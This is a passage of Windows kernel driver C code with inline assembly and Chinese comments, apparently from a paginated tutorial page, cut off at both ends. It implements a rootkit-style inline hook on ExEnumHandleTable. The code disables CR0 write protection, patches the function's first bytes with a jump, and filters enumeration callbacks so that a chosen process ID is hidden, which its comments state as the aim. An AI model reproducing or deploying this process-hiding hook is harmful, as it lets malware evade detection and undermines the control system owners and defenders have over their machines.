p; }
}
BOOL FilterCallback (
DWORD HANDLE_TALBE_ENTRY,
DWORD PID,
PVOID Param )
{
if ( PID != (DWORD)ProtectID) //判断是否是我们要隐藏的进程
{
return OldCallback (
HANDLE_TALBE_ENTRY,
PID,
Param );
}
else
{
return FALSE; //是的话直接返回
}
}
VOID NewExEnumHandleTable(
PULONG HandleTable,
PVOID Callback,
PVOID Param,
PHANDLE Handle OPTIONAL )
{
OldCallback = Callback; //把Callback参数给OldCallback进行保留
Callback = FilterCallback; //用FilterCallback替换调原来的Callback
_asm //还原
{
pushad
mov edi, OldExEnumHandleTable
mov eax, dword ptr ResumCodeExEnumHandleTable[0]
mov [edi], eax
mov ax, word ptr ResumCodeExEnumHandleTable[4]
mov [edi+4], ax
popad
}
OldExEnumHandleTable (
HandleTable,
Callback,
Param,
Handle OPTIONAL );
_asm //替换
{
pushad
mov edi, OldExEnumHandleTable
mov eax, dword ptr CrackCodeExEnumHandleTable[0]
mov [edi], eax
mov ax, word ptr CrackCodeExEnumHandleTable[4]
mov [edi+4], ax
popad
}
return ;
}
NTSTATUS PatchExEnumHandleTable()
{
NTSTATUS Status;
OldExEnumHandleTable = (EXENUMHANDLETABLE) GetFunctionAddr(L"ExEnumHandleTable");
if ( OldExEnumHandleTable == NULL )
{
DbgPrint("Get ExEnumHandleTable Addr Error!!");
return STATUS_DEVICE_CONFIGURATION_ERROR;
}
_asm //关中断
{
CLI
MOV EAX, CR0
AND EAX, NOT 10000H
MOV CR0, EAX
}
_asm
{
pushad
//获取ExEnumHandleTable函数的地址并保留该函数的起始六个字节
mov edi, OldExEnumHandleTable
mov eax, [edi]
mov dword ptr ResumCodeExEnumHandleTable[0], eax
mov ax, [edi+4]
mov word ptr ResumCodeExEnumHandleTable[4], ax
//构造要替换的代码,使得系统调用该函数时跳到我们构造的NewExEnumHandleTable去执行
mov byte ptr CrackCodeExEnumHandleTable[0], 0x68
lea edi, NewExEnumHandleTable
mov dword ptr CrackCodeExEnumHandleTable[1], edi
mov byte ptr CrackCodeExEnumHandleTable[5], 0xC3
//把构造好的代码进心替换
mov edi, OldExEnumHandleTable
mov eax, dword ptr CrackCodeExEnumHandleTable[0]
mov dword ptr[edi], eax
mov ax, word ptr CrackCodeExEnumHandleTable[4]
mov word ptr[edi+4], ax
popad
}
_asm //开中断
{
MOV EAX, CR0
OR EAX, 10000H
MOV CR0, EAX
STI
&n 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >> |
